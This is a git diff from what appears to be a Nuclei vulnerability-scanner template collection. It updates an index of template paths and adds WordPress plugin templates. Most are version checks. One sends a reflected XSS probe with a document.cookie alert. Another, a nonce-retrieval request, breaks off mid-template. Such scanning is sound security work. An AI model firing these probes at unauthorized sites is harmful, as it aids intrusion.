diff --git a/date.txt b/date.txt index d4528d6fc4..6f2cf7ace4 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241221 +20241222 diff --git a/poc.txt b/poc.txt index 60f4ff7edf..a71e91a7bf 100644 --- a/poc.txt +++ b/poc.txt @@ -4880,6 +4880,7 @@ ./poc/auth/rdp-connections-without-password-allowed.yaml ./poc/auth/reactapp-password.yaml ./poc/auth/reactflow-session-replay-heatmap-38be705ad3ea6bee0782af8bbd1e1f3a.yaml +./poc/auth/reactflow-session-replay-heatmap.yaml ./poc/auth/readarr-dashboard-unauth.yaml ./poc/auth/real-cookie-banner-1dba91bdd70cfd02be29db46dcf540b8.yaml ./poc/auth/real-cookie-banner-2ba39ea793cd92ced5c4447d57e663b5.yaml @@ -6921,6 +6922,7 @@ ./poc/aws/wp-live-chat-support-a354171e3fe06ff8f1d83d5bec2cd4a6.yaml ./poc/aws/wp-maintenance-59113e30281ebcf6502fa89059001ec2.yaml ./poc/aws/wp-migrate-2-aws-e5583657ed5a9882a96eea1651f9a809.yaml +./poc/aws/wp-migrate-2-aws.yaml ./poc/aws/wp-nested-pages-c8ec22abe6df2be7ec900d10da0ee46c.yaml ./poc/aws/wp-photo-album-plus-aa5e2d80c37dbec28ba2b57b14b13c18.yaml ./poc/aws/wp-private-messages-c0d9fc663e406dc24cec2c03687d55c8.yaml @@ -10323,6 +10325,7 @@ ./poc/cve/CVE-2014-4537.yaml ./poc/cve/CVE-2014-4538-815dca23d1f2b8af9d9f1b320c4ac558.yaml ./poc/cve/CVE-2014-4538.yaml +./poc/cve/CVE-2014-4539-2356.yaml ./poc/cve/CVE-2014-4539-2358.yaml ./poc/cve/CVE-2014-4539-86076b63a8d6f7ed94e04009da86c5b5.yaml ./poc/cve/CVE-2014-4539.yaml @@ -17894,6 +17897,7 @@ ./poc/cve/CVE-2021-24277-a9b3b73eb42fa5bd0785720ab1f1312f.yaml ./poc/cve/CVE-2021-24277.yaml ./poc/cve/CVE-2021-24278-5667.yaml +./poc/cve/CVE-2021-24278-5668.yaml ./poc/cve/CVE-2021-24278-5669.yaml ./poc/cve/CVE-2021-24278-e6fbe6efa1e8d2bc3a84e72109aaad1d.yaml ./poc/cve/CVE-2021-24278.yaml @@ -18159,6 +18163,7 @@ ./poc/cve/CVE-2021-24388.yaml ./poc/cve/CVE-2021-24389-06a3e9b6b25dd1aa8ca593f5bb9ce3d3.yaml ./poc/cve/CVE-2021-24389-5727.yaml +./poc/cve/CVE-2021-24389-5729.yaml ./poc/cve/CVE-2021-24389-5731.yaml ./poc/cve/CVE-2021-24389.yaml ./poc/cve/CVE-2021-24390-33ca2ab1d147e6ae40fe998202ee7899.yaml @@ -19665,6 +19670,7 @@ ./poc/cve/CVE-2021-25118.yaml ./poc/cve/CVE-2021-25119-f5c0b4d298d9925ecfefb6d03108787d.yaml ./poc/cve/CVE-2021-25119.yaml +./poc/cve/CVE-2021-25120(1).yaml ./poc/cve/CVE-2021-25120-2cfdef0c57bf89b381b2ca47e005682f.yaml ./poc/cve/CVE-2021-25120-5806.yaml ./poc/cve/CVE-2021-25120-741620318602be588fe47e36ac60a05f.yaml @@ -21257,6 +21263,7 @@ ./poc/cve/CVE-2022-0199.yaml ./poc/cve/CVE-2022-0200-a080db633519aa1864ec028708ce4181.yaml ./poc/cve/CVE-2022-0200.yaml +./poc/cve/CVE-2022-0201(1).yaml ./poc/cve/CVE-2022-0201-e8037a45d11950f78502700c271f8eb0.yaml ./poc/cve/CVE-2022-0201.yaml ./poc/cve/CVE-2022-0205-79c3931ac9c5d289f945288d2a273508.yaml @@ -37048,6 +37055,7 @@ ./poc/cve/CVE-2024-1044-5720ea5d7eef8537b26bc9836c2599a3.yaml ./poc/cve/CVE-2024-1044.yaml ./poc/cve/CVE-2024-10453-68cf66b7073e2bbdcfb231b1737ffdbf.yaml +./poc/cve/CVE-2024-10453.yaml ./poc/cve/CVE-2024-1046-bfec7425f9f443824c4a93511a98dbc5.yaml ./poc/cve/CVE-2024-1046.yaml ./poc/cve/CVE-2024-1047-273d9f70b785499b0bfe887c8e308bb5.yaml @@ -37358,6 +37366,7 @@ ./poc/cve/CVE-2024-10796-56d4ab488b35218c5b7041a4c4f135b2.yaml ./poc/cve/CVE-2024-10796.yaml ./poc/cve/CVE-2024-10797-8735cd5ecd4eb322a4cce0b2bcfa0daf.yaml +./poc/cve/CVE-2024-10797.yaml ./poc/cve/CVE-2024-10798-6a4ce5a3ceec5f176ee898e8447c08f9.yaml ./poc/cve/CVE-2024-10798.yaml ./poc/cve/CVE-2024-1080-15318692234db11db0354155dd2f2282.yaml @@ -37622,6 +37631,7 @@ ./poc/cve/CVE-2024-11195-c691007e253c4054d9b611e5bdf99fc3.yaml ./poc/cve/CVE-2024-11195.yaml ./poc/cve/CVE-2024-11196-f6d286fa677ac17e271cb0be03129144.yaml +./poc/cve/CVE-2024-11196.yaml ./poc/cve/CVE-2024-11197-b1a29e2fb93e8f055bb485dbbb4122a8.yaml ./poc/cve/CVE-2024-11197.yaml ./poc/cve/CVE-2024-11198-7108f91753177b57d90e0bcfd7eda520.yaml @@ -37697,12 +37707,14 @@ ./poc/cve/CVE-2024-11278-f2f3b28a1bbcb829b720cfe84f4bb1fb.yaml ./poc/cve/CVE-2024-11278.yaml ./poc/cve/CVE-2024-11279-44f0b55d27530f91d8cdbd7abb1afb80.yaml +./poc/cve/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml ./poc/cve/CVE-2024-11279.yaml ./poc/cve/CVE-2024-1128-67d8835f2e0e8ac11d097612ad9e363c.yaml ./poc/cve/CVE-2024-1128.yaml ./poc/cve/CVE-2024-11280-5fc818fb5755c827e8f432424205f35a.yaml ./poc/cve/CVE-2024-11280.yaml ./poc/cve/CVE-2024-11287-33536fea15ec5164056e1863a099338b.yaml +./poc/cve/CVE-2024-11287.yaml ./poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml ./poc/cve/CVE-2024-11289.yaml ./poc/cve/CVE-2024-1129-0aba491c9fa777fb284efdb308d0b368.yaml @@ -37756,6 +37768,7 @@ ./poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml ./poc/cve/CVE-2024-11342.yaml ./poc/cve/CVE-2024-11349-492c070998afb1c1259a8c8e6c2a2e7c.yaml +./poc/cve/CVE-2024-11349.yaml ./poc/cve/CVE-2024-11351-346ec8802b5c9856cc4de3ce608f3d2b.yaml ./poc/cve/CVE-2024-11351.yaml ./poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml @@ -37956,6 +37969,7 @@ ./poc/cve/CVE-2024-1168-b3017b867a5b3352aca4d53b40ceb34f.yaml ./poc/cve/CVE-2024-1168.yaml ./poc/cve/CVE-2024-11682-f008a2d5e25cf2cd1eef864640aea744.yaml +./poc/cve/CVE-2024-11682.yaml ./poc/cve/CVE-2024-11683-ec4fd479846e16d6cba34a03c8af511d.yaml ./poc/cve/CVE-2024-11683.yaml ./poc/cve/CVE-2024-11684-c29ca2f7fe511fd84c547f32d0da9702.yaml @@ -37965,6 +37979,7 @@ ./poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml ./poc/cve/CVE-2024-11687.yaml ./poc/cve/CVE-2024-11688-14d2a5f31dc0e4861931d1fc0c65a354.yaml +./poc/cve/CVE-2024-11688.yaml ./poc/cve/CVE-2024-11689-2f68396da54e847bcebf89b7fb249d95.yaml ./poc/cve/CVE-2024-11689.yaml ./poc/cve/CVE-2024-1169-007e07b24673895c34505297aed33632.yaml @@ -37996,6 +38011,7 @@ ./poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml ./poc/cve/CVE-2024-11721.yaml ./poc/cve/CVE-2024-11722-13dedbf7f4be1ec6f6f6ff2a845970ec.yaml +./poc/cve/CVE-2024-11722.yaml ./poc/cve/CVE-2024-11723-3366767029ed4cddc51404d71df8d881.yaml ./poc/cve/CVE-2024-11723.yaml ./poc/cve/CVE-2024-11724-daedb7c1f67f714549143733b33e7b1b.yaml @@ -38042,6 +38058,7 @@ ./poc/cve/CVE-2024-11760.yaml ./poc/cve/CVE-2024-11761-c12436c899eba37de36a3435c092ea47.yaml ./poc/cve/CVE-2024-11761.yaml +./poc/cve/CVE-2024-11763-7c77355461cb32e1d2f805bce3503999.yaml ./poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml ./poc/cve/CVE-2024-11763.yaml ./poc/cve/CVE-2024-11765-76af6f6ec0d2cae37ca638893b9e6e7c.yaml @@ -38062,6 +38079,7 @@ ./poc/cve/CVE-2024-11774.yaml ./poc/cve/CVE-2024-11775-e72bc808871e6f6b1ff68d8fcae55f02.yaml ./poc/cve/CVE-2024-11775.yaml +./poc/cve/CVE-2024-11776-8aa2f830d09b9ce0bf39fad8d531748b.yaml ./poc/cve/CVE-2024-11776-d462ec41233e3d102bf71944a60e6b05.yaml ./poc/cve/CVE-2024-11776.yaml ./poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml @@ -38091,11 +38109,13 @@ ./poc/cve/CVE-2024-11807-4dfe886308ff3702aa6f118a69b41dde.yaml ./poc/cve/CVE-2024-11807.yaml ./poc/cve/CVE-2024-11808-e8f2f8bf443bbbf9f355079310951d95.yaml +./poc/cve/CVE-2024-11808.yaml ./poc/cve/CVE-2024-11809-f088a4ea2afc64dbeeb9c239f0dd835c.yaml ./poc/cve/CVE-2024-11809.yaml ./poc/cve/CVE-2024-1181-e1aeb270ea4b669129dd0982e0118a5d.yaml ./poc/cve/CVE-2024-1181.yaml ./poc/cve/CVE-2024-11811-931cffef1fe7884e7e5c1bc5b3f11a46.yaml +./poc/cve/CVE-2024-11811.yaml ./poc/cve/CVE-2024-11812-18a938adfa6071ed20fd7578bc27a8e9.yaml ./poc/cve/CVE-2024-11812.yaml ./poc/cve/CVE-2024-11813-9a6d1b16c5d6577e7e1c14516dfd9060.yaml @@ -38120,6 +38140,7 @@ ./poc/cve/CVE-2024-11844.yaml ./poc/cve/CVE-2024-11846-2b66d0ccd63edeb0552c230fce20bb3a.yaml ./poc/cve/CVE-2024-11846.yaml +./poc/cve/CVE-2024-11852-f4234a32245049244f37cd7740e74ea6.yaml ./poc/cve/CVE-2024-11853-f5e53babbfd72e76b10eb0e04ce9ba66.yaml ./poc/cve/CVE-2024-11853.yaml ./poc/cve/CVE-2024-11854-a4609a0b6d30b84bf011e2cc0f757890.yaml @@ -38164,6 +38185,7 @@ ./poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml ./poc/cve/CVE-2024-11888.yaml ./poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml +./poc/cve/CVE-2024-11889-abab61b0537d4711fbf17b6aaa4ee44b.yaml ./poc/cve/CVE-2024-11889.yaml ./poc/cve/CVE-2024-11891-5fc76ceed31c732ecf98a91613f60c7c.yaml ./poc/cve/CVE-2024-11891.yaml @@ -38172,6 +38194,7 @@ ./poc/cve/CVE-2024-11894-672b80b4e5ba42bbc36eb516adecdaa7.yaml ./poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml ./poc/cve/CVE-2024-11894.yaml +./poc/cve/CVE-2024-11897-1fb1c29d5a055c1052a1cda023eec838.yaml ./poc/cve/CVE-2024-11897-ff5f1c15b11b473bc3f465bc84ff070d.yaml ./poc/cve/CVE-2024-11897.yaml ./poc/cve/CVE-2024-11898-e1ae02693b266829682dda11586fd4c0.yaml @@ -38210,6 +38233,7 @@ ./poc/cve/CVE-2024-11935-088fa6aefbb99715a7cda0aadf2f36df.yaml ./poc/cve/CVE-2024-11935.yaml ./poc/cve/CVE-2024-11938-a897d23a992f88a13f8a92c28cfec734.yaml +./poc/cve/CVE-2024-11938.yaml ./poc/cve/CVE-2024-11940-2854432d18024963eba154af3544251e.yaml ./poc/cve/CVE-2024-11940.yaml ./poc/cve/CVE-2024-11943-9cc06cbd2cda10ebe942d226be8a34ce.yaml @@ -38221,7 +38245,9 @@ ./poc/cve/CVE-2024-11973-f69e0f1a9b5be8876a50aaeb0e8cba7f.yaml ./poc/cve/CVE-2024-11973.yaml ./poc/cve/CVE-2024-11975-05a237ca7357ff8d76d54d31a44bc202.yaml +./poc/cve/CVE-2024-11975.yaml ./poc/cve/CVE-2024-11977-0110488fb1a5f556982113b515b4f15e.yaml +./poc/cve/CVE-2024-11977.yaml ./poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml ./poc/cve/CVE-2024-12003.yaml ./poc/cve/CVE-2024-12004-f153a59c093bcc077a8d5197337c2b1a.yaml @@ -38264,6 +38290,7 @@ ./poc/cve/CVE-2024-12062-e6f7834c3eb1eb9aabc9534922a2b0a2.yaml ./poc/cve/CVE-2024-12062.yaml ./poc/cve/CVE-2024-12066-a769524de5fd8cbd0b99e8393122048b.yaml +./poc/cve/CVE-2024-12066.yaml ./poc/cve/CVE-2024-1207-9fc726e35e00675f40b1bb34bea36c9b.yaml ./poc/cve/CVE-2024-1207.yaml ./poc/cve/CVE-2024-12072-24b9b896e743f123599e257b8923909a.yaml @@ -38338,6 +38365,7 @@ ./poc/cve/CVE-2024-12260-e830e5f6450ff91a722bdd1a788fe6ed.yaml ./poc/cve/CVE-2024-12260.yaml ./poc/cve/CVE-2024-12262-44dd458108e38e1a10ff93aa59a1bca6.yaml +./poc/cve/CVE-2024-12262.yaml ./poc/cve/CVE-2024-12263-fa7054e9893ee8c27ef6719a5ea1e128.yaml ./poc/cve/CVE-2024-12263.yaml ./poc/cve/CVE-2024-12265-4d7040bb415a90201c0256916d4da2c7.yaml @@ -38379,6 +38407,7 @@ ./poc/cve/CVE-2024-12333-7b6d410c0b3b65296f542385dba469b2.yaml ./poc/cve/CVE-2024-12333.yaml ./poc/cve/CVE-2024-12338-5605bf55e24ce1b2233083e5c7c380b3.yaml +./poc/cve/CVE-2024-12338-7049005d472255be06aaa45a94022e7a.yaml ./poc/cve/CVE-2024-12338.yaml ./poc/cve/CVE-2024-1234-f40f3ae232b12cf9233c22ef4e6ba985.yaml ./poc/cve/CVE-2024-1234.yaml @@ -38402,6 +38431,7 @@ ./poc/cve/CVE-2024-12406-875253838d8ed29a504f0efa7c687009.yaml ./poc/cve/CVE-2024-12406.yaml ./poc/cve/CVE-2024-12408-260120a293bed72f17136733a5d35a68.yaml +./poc/cve/CVE-2024-12408.yaml ./poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml ./poc/cve/CVE-2024-12411.yaml ./poc/cve/CVE-2024-12414-86f1cff4a3be047a175aa262edd3a292.yaml @@ -38451,6 +38481,7 @@ ./poc/cve/CVE-2024-12500.yaml ./poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml ./poc/cve/CVE-2024-12501.yaml +./poc/cve/CVE-2024-12502-165e0e004bfa0e15f19fa07916376304.yaml ./poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml ./poc/cve/CVE-2024-12502.yaml ./poc/cve/CVE-2024-12506-cf470529a5d6c836ebd2593b5d0d238a.yaml @@ -38470,6 +38501,7 @@ ./poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml ./poc/cve/CVE-2024-12555.yaml ./poc/cve/CVE-2024-12558-027030512640daa77ea3d82e9a1d2312.yaml +./poc/cve/CVE-2024-12558.yaml ./poc/cve/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml ./poc/cve/CVE-2024-12560.yaml ./poc/cve/CVE-2024-12571-f40f1a845a76c59ba969efe2f001fffb.yaml @@ -38485,7 +38517,9 @@ ./poc/cve/CVE-2024-12581-76cef049807f0d0c701a5c76e40729ed.yaml ./poc/cve/CVE-2024-12581.yaml ./poc/cve/CVE-2024-12588-74fdbee90e8f1569c31b65ae5ac69c79.yaml +./poc/cve/CVE-2024-12588.yaml ./poc/cve/CVE-2024-12591-2661762fc85d1a9540507c69b111201b.yaml +./poc/cve/CVE-2024-12591.yaml ./poc/cve/CVE-2024-12596-774434bb9ea28259fa8266e81972c00f.yaml ./poc/cve/CVE-2024-12596.yaml ./poc/cve/CVE-2024-12601-b82cf7ad4580a990c2c5594b0652b203.yaml @@ -38495,8 +38529,11 @@ ./poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml ./poc/cve/CVE-2024-12628.yaml ./poc/cve/CVE-2024-12635-092a05628ca831a1bb9c607c24d54577.yaml +./poc/cve/CVE-2024-12635.yaml ./poc/cve/CVE-2024-12697-8db77733a75f37172aa83e4825bd6e85.yaml +./poc/cve/CVE-2024-12697.yaml ./poc/cve/CVE-2024-12721-e696c3790eb4b1341769185b659235b2.yaml +./poc/cve/CVE-2024-12721.yaml ./poc/cve/CVE-2024-1273-7a7d027c3b90e9a4f71fda8d00cf65ff.yaml ./poc/cve/CVE-2024-1273.yaml ./poc/cve/CVE-2024-1274-99ad6cb9c59b62a5b587ddfed8885ae2.yaml @@ -38506,6 +38543,7 @@ ./poc/cve/CVE-2024-1277-c0472cd2f2d47ecb572d1b740758f8aa.yaml ./poc/cve/CVE-2024-1277.yaml ./poc/cve/CVE-2024-12771-cd6721ae7264b86b9c92e3b0360445d3.yaml +./poc/cve/CVE-2024-12771.yaml ./poc/cve/CVE-2024-1278-647797a8bf03897ebf803aa058161703.yaml ./poc/cve/CVE-2024-1278.yaml ./poc/cve/CVE-2024-1279-c5ebaedae6f5a39d336cc34b0dda57a1.yaml @@ -38519,6 +38557,7 @@ ./poc/cve/CVE-2024-1287-efe3489231c31f4d43f77c6de501ea78.yaml ./poc/cve/CVE-2024-1287.yaml ./poc/cve/CVE-2024-12875-fdfbb98d9e9a1f9c1127b7881e3d0e1b.yaml +./poc/cve/CVE-2024-12875.yaml ./poc/cve/CVE-2024-1288-ad8e303714cb9fe760dadd732ba57794.yaml ./poc/cve/CVE-2024-1288.yaml ./poc/cve/CVE-2024-1289-211181e3b234d5799f76a84c8d6b1a61.yaml @@ -52092,6 +52131,7 @@ ./poc/cve/CVE-2024-9543-2a84b7caa56d7b7baa1f298aba568720.yaml ./poc/cve/CVE-2024-9543.yaml ./poc/cve/CVE-2024-9545-383a080b0508dbca93fe0cae0c28ae26.yaml +./poc/cve/CVE-2024-9545.yaml ./poc/cve/CVE-2024-9546-393c04a252e7afb4c4921ddce751cf73.yaml ./poc/cve/CVE-2024-9546.yaml ./poc/cve/CVE-2024-9548-4c3a7fa475046e4dcaed7de30c0d051a.yaml @@ -66934,6 +66974,7 @@ ./poc/injection/74cms-Template-Injection-rce.yaml ./poc/injection/74cms-v3-Boolean-injection.yaml ./poc/injection/Command Injection.yaml +./poc/injection/Command-Injection.yaml ./poc/injection/GLPI-9.3.3-SQL-Injection.yaml ./poc/injection/Header-Injection.yaml ./poc/injection/PHP - Command injection.yaml @@ -70928,6 +70969,7 @@ ./poc/microsoft/smsa-shipping-for-woocommerce-15e38eb587a64dc844ec6f253c86a305.yaml ./poc/microsoft/smsa-shipping-for-woocommerce.yaml ./poc/microsoft/smsa-shipping-official-f19b56a54562a16962217b4283cfecb5.yaml +./poc/microsoft/smsa-shipping-official.yaml ./poc/microsoft/smsify-ad1209d7c6326409ba6a9eb7af4aa164.yaml ./poc/microsoft/smsify.yaml ./poc/microsoft/smsmaster-476a7e3a40fa1e840322928f3de2f63f.yaml @@ -85409,6 +85451,7 @@ ./poc/other/addthis-plugin.yaml ./poc/other/addthis.yaml ./poc/other/adforest-e83f34353ce1bb79d2c778a1988f4ca8.yaml +./poc/other/adforest.yaml ./poc/other/adfoxly-1c77bc97f662cb2c20483d034e173297.yaml ./poc/other/adfoxly-3eb667180bcaf12c6c10c99114ccf3b8.yaml ./poc/other/adfoxly-4c613eb3f9ae83b4f2727f836be94578.yaml @@ -88128,6 +88171,7 @@ ./poc/other/bdthemes-element-pack-lite-c6829522c8e27d6b9c8f5bf83877d258.yaml ./poc/other/bdthemes-element-pack-lite-d09dc2c8702152421fafacc3ee5ef7d2.yaml ./poc/other/bdthemes-element-pack-lite-e75b379cf6355c3c75badc4442c21743.yaml +./poc/other/bdthemes-element-pack-lite-ef972b4a35b32092eeac378b1e4501b8.yaml ./poc/other/bdthemes-element-pack-lite-f71561f71d98bd754d22aea0a3060cfe.yaml ./poc/other/bdthemes-element-pack-lite-fd25739750193b1934e6e3650f6ca4a2.yaml ./poc/other/bdthemes-element-pack-lite.yaml @@ -98039,6 +98083,7 @@ ./poc/other/full-page-blog-designer-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/full-page-blog-designer.yaml ./poc/other/full-screen-menu-for-elementor-d260d7eb2da867209574048a4e6c77b0.yaml +./poc/other/full-screen-menu-for-elementor.yaml ./poc/other/full-screen-page-background-image-slideshow-6def5bf7385a589549cc6977b19eb2ae.yaml ./poc/other/full-screen-page-background-image-slideshow.yaml ./poc/other/full-site-editing-24836cca8d46e399082ff66df1b9f2f5.yaml @@ -103269,6 +103314,7 @@ ./poc/other/magicform.yaml ./poc/other/magicmail.yaml ./poc/other/magicpost-6538fe9c7722fa6358b7d4a11ba3b7cc.yaml +./poc/other/magicpost.yaml ./poc/other/magix.yaml ./poc/other/magmi-workflow.yaml ./poc/other/magnitudo-08d4fcc2d75478c02a0b3e70805823f7.yaml @@ -107733,6 +107779,7 @@ ./poc/other/ping-list-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/ping-list-pro-plugin.yaml ./poc/other/ping-list-pro.yaml +./poc/other/pingmeter-uptime-monitoring.yaml ./poc/other/pinkbike.yaml ./poc/other/pinpoint.yaml ./poc/other/pinterest-pin-it-button-on-image-hover-and-post-196869e0a4feff678ee2e7f2514404b4.yaml @@ -119189,6 +119236,7 @@ ./poc/other/woo-nmi-three-step-plugin.yaml ./poc/other/woo-nmi-three-step.yaml ./poc/other/woo-one-click-upsell-funnel-98ebab5be77d58e4cde51e12bd3679c2.yaml +./poc/other/woo-one-click-upsell-funnel.yaml ./poc/other/woo-order-export-lite-3e1a792b5b6f662aa344faa9b02c403d.yaml ./poc/other/woo-order-export-lite-929b62df5140955c6b18d3bfadeb9f57.yaml ./poc/other/woo-order-export-lite-9d07a9d92ce55bba4fd7fe6b21f1c057.yaml @@ -124040,6 +124088,7 @@ ./poc/remote_code_execution/wantit-erp-rce.yaml ./poc/remote_code_execution/wavlnk_router_rce.yaml ./poc/remote_code_execution/wb-custom-product-tabs-for-woocommerce-0d6d3a2eb43a5b249c178d2b2d5f4cb5.yaml +./poc/remote_code_execution/wb-custom-product-tabs-for-woocommerce.yaml ./poc/remote_code_execution/wc-customer-source-3baa6cc7c9b97bdb322dbcfa3bb0f658.yaml ./poc/remote_code_execution/wc-customer-source.yaml ./poc/remote_code_execution/weaver-e-mobile-rce.yaml @@ -128940,6 +128989,7 @@ ./poc/sql/CVE-2024-1127-96dba372bfefb2c18f635a1075e27756.yaml ./poc/sql/CVE-2024-11277-371669e41b1bdbea10af14d85581448c.yaml ./poc/sql/CVE-2024-11279-44f0b55d27530f91d8cdbd7abb1afb80.yaml +./poc/sql/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml ./poc/sql/CVE-2024-1129-0aba491c9fa777fb284efdb308d0b368.yaml ./poc/sql/CVE-2024-1130-098b26182013dbcd4e8583ec0a56cb16.yaml ./poc/sql/CVE-2024-11326-0c8fabfd859db33f6ff486f4e38a0506.yaml @@ -138460,6 +138510,7 @@ ./poc/web/google-website-translator.yaml ./poc/web/gotweb-detect.yaml ./poc/web/gwebpro-store-locator-a48522809c277db29c19ddd5318a9a6f.yaml +./poc/web/gwebpro-store-locator.yaml ./poc/web/h2-database-web-console-unauthorized-access.yaml ./poc/web/h2-database-web-console-unauthorized-access.yml ./poc/web/h3c-web-managerment-home.yaml @@ -144768,6 +144819,7 @@ ./poc/wordpress/wp-microblogs-b79ee3b117bf563b5053a87d9a8d154e.yaml ./poc/wordpress/wp-microblogs.yaml ./poc/wordpress/wp-migrate-2-aws-e5583657ed5a9882a96eea1651f9a809.yaml +./poc/wordpress/wp-migrate-2-aws.yaml ./poc/wordpress/wp-migrate-db-pro-13aac3da620867d00a2f14aa8693ee41.yaml ./poc/wordpress/wp-migrate-db-pro.yaml ./poc/wordpress/wp-migrate-db.yaml diff --git a/poc/auth/reactflow-session-replay-heatmap.yaml b/poc/auth/reactflow-session-replay-heatmap.yaml new file mode 100644 index 0000000000..ecfa5fa015 --- /dev/null +++ b/poc/auth/reactflow-session-replay-heatmap.yaml @@ -0,0 +1,59 @@ +id: reactflow-session-replay-heatmap-38be705ad3ea6bee0782af8bbd1e1f3a + +info: + name: > + Reactflow Visitor Recording and Heatmaps <= 1.0.10 - Cross-Site Request Forgery to Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eb360c56-e144-4dc5-8bfb-715a014cb8e6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/reactflow-session-replay-heatmap/" + google-query: inurl:"/wp-content/plugins/reactflow-session-replay-heatmap/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,reactflow-session-replay-heatmap,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/reactflow-session-replay-heatmap/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "reactflow-session-replay-heatmap" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.10') \ No newline at end of file diff --git a/poc/aws/wp-migrate-2-aws.yaml b/poc/aws/wp-migrate-2-aws.yaml new file mode 100644 index 0000000000..6da15ed022 --- /dev/null +++ b/poc/aws/wp-migrate-2-aws.yaml @@ -0,0 +1,59 @@ +id: wp-migrate-2-aws-e5583657ed5a9882a96eea1651f9a809 + +info: + name: > + WP on AWS <= 5.2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c82dc37-0b9a-48c2-a8a6-fbee6182003f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-migrate-2-aws/" + google-query: inurl:"/wp-content/plugins/wp-migrate-2-aws/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-migrate-2-aws,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-migrate-2-aws/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-migrate-2-aws" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2014-4539-2356.yaml b/poc/cve/CVE-2014-4539-2356.yaml new file mode 100644 index 0000000000..6d6a56000d --- /dev/null +++ b/poc/cve/CVE-2014-4539-2356.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4539 + +info: + name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4539 + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4539 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/cve/CVE-2021-24278-5668.yaml b/poc/cve/CVE-2021-24278-5668.yaml new file mode 100644 index 0000000000..72d1bc60ec --- /dev/null +++ b/poc/cve/CVE-2021-24278-5668.yaml @@ -0,0 +1,46 @@ +id: CVE-2021-24278 + +info: + name: Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation + author: 2rs3c + severity: high + description: In the Redirection for Contact Form 7 WordPress plugin before 2.3.4, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24278 + - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413 + - https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/ + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-24278 + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php" + + headers: + 